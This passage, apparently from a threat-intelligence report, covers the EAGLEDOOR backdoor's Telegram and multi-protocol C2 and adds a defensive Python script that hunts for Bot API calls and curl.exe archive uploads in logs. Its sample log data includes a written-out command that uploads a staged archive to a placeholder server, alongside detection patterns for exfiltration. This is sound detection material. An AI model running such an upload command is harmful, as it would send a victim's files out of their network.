<p>The EAGLEDOOR backdoor can communicate with C2 via DNS, HTTP, TCP, and Telegram. While TCP, HTTP, and DNS are used to send the victim machine’s status, the main backdoor functionality is handled through the Telegram Bot API. The malicious code supports methods like <code>getFile</code>, <code>getUpdates</code>, <code>sendDocument</code>, and <code>sendMessage</code> to gather information, transfer files, and execute payloads. However, in the collected samples, only the TCP and HTTP protocols were observed on the victim’s side. Earth Baxia exfiltrates data in archives that are transferred using <code>curl.exe</code>.</p>
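<p>The two behaviours above (Bot API calls for the listed methods, and <code>curl.exe</code> pushing archives) translate directly into hunting logic. The following is an added example, not code from the report or from the malware: it scans constructed proxy and process-creation log lines for those patterns. The log layouts, host names, paths and IPs are assumptions for illustration; the only page-derived facts are the four Bot API method names and the use of <code>curl.exe</code> for archive transfer. The Bot API URL shape <code>https://api.telegram.org/bot&lt;token&gt;/&lt;method&gt;</code> is Telegram's documented format.</p>

```python
"""Hunt helpers for the EAGLEDOOR C2 behaviours described above.

Added example, not code from the report. Inputs are constructed sample
lines in a hypothetical proxy/process log layout (an assumption); adapt
the parsers to your own telemetry.
"""
import re
from urllib.parse import urlsplit

# Telegram Bot API methods the backdoor is reported to support.
EAGLEDOOR_BOT_METHODS = {"getFile", "getUpdates", "sendDocument", "sendMessage"}

# Bot API URLs look like https://api.telegram.org/bot<token>/<method>;
# only the method name is needed, the token is never inspected.
BOT_API_RE = re.compile(r"^/bot[^/]+/(?P<method>[A-Za-z]+)")

# Archive extensions that typically indicate staged data (assumption).
ARCHIVE_EXTS = (".zip", ".rar", ".7z", ".tar", ".gz", ".cab")


def telegram_bot_method(url):
    """Return the Bot API method if url targets api.telegram.org/bot..., else None."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = BOT_API_RE.match(parts.path)
    return m.group("method") if m else None


def scan_proxy_log(lines):
    """Proxy lines: '<ts> <client_ip> <process> <verb> <url>' (constructed layout).
    Flags Bot API calls whose method is one EAGLEDOOR supports."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue
        ts, client, process, _verb, url = fields
        method = telegram_bot_method(url)
        if method in EAGLEDOOR_BOT_METHODS:
            hits.append({"ts": ts, "client": client, "process": process,
                         "bot_method": method})
    return hits


def scan_process_log(lines):
    """Process-creation lines: '<ts> <host> <image> <command line>' (constructed layout).
    Flags curl.exe launched with an archive on its command line, the
    exfiltration pattern attributed to Earth Baxia."""
    hits = []
    for line in lines:
        fields = line.split(maxsplit=3)
        if len(fields) != 4:
            continue
        ts, host, image, cmdline = fields
        has_archive = any(tok.lower().endswith(ARCHIVE_EXTS) for tok in cmdline.split())
        if image.lower().endswith("curl.exe") and has_archive:
            hits.append({"ts": ts, "host": host, "cmdline": cmdline})
    return hits


# Constructed sample telemetry; hosts, IPs, process names and token are placeholders.
PROXY_SAMPLE = [
    "2024-07-01T10:00:01Z 10.1.2.3 updater.exe GET https://api.telegram.org/botPLACEHOLDER_TOKEN/getUpdates",
    "2024-07-01T10:00:05Z 10.1.2.3 updater.exe POST https://api.telegram.org/botPLACEHOLDER_TOKEN/sendDocument",
    "2024-07-01T10:00:07Z 10.1.2.9 chrome.exe GET https://web.telegram.org/",
    "2024-07-01T10:00:09Z 10.1.2.3 updater.exe GET https://api.telegram.org/botPLACEHOLDER_TOKEN/getMe",
]
PROCESS_SAMPLE = [
    "2024-07-01T10:01:00Z WS01 C:\\Windows\\System32\\curl.exe curl.exe -F file=@C:\\Users\\Public\\stage.rar http://203.0.113.5/upload",
    "2024-07-01T10:01:30Z WS01 C:\\Windows\\System32\\curl.exe curl.exe -s https://example.com/health",
    "2024-07-01T10:02:00Z WS02 C:\\Tools\\7z.exe 7z.exe a C:\\Users\\Public\\stage.rar C:\\Users\\Public\\docs",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(PROXY_SAMPLE):
        print("telegram-bot-c2", hit)
    for hit in scan_process_log(PROCESS_SAMPLE):
        print("curl-archive-upload", hit)
```

<p>The method allowlist matters: the fourth proxy line calls <code>getMe</code>, a legitimate Bot API method not among those the report attributes to EAGLEDOOR, and is left alone, while the browser session to <code>web.telegram.org</code> never matches the API host. The process scan only fires on the conjunction of <code>curl.exe</code> and an archive argument, so the archiver creating <code>stage.rar</code> is not itself an alert; in practice you would correlate the two hits by host and time.</p>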
<p><em>“Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries,”</em> concludes the report. <em>“They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations.”</em></p>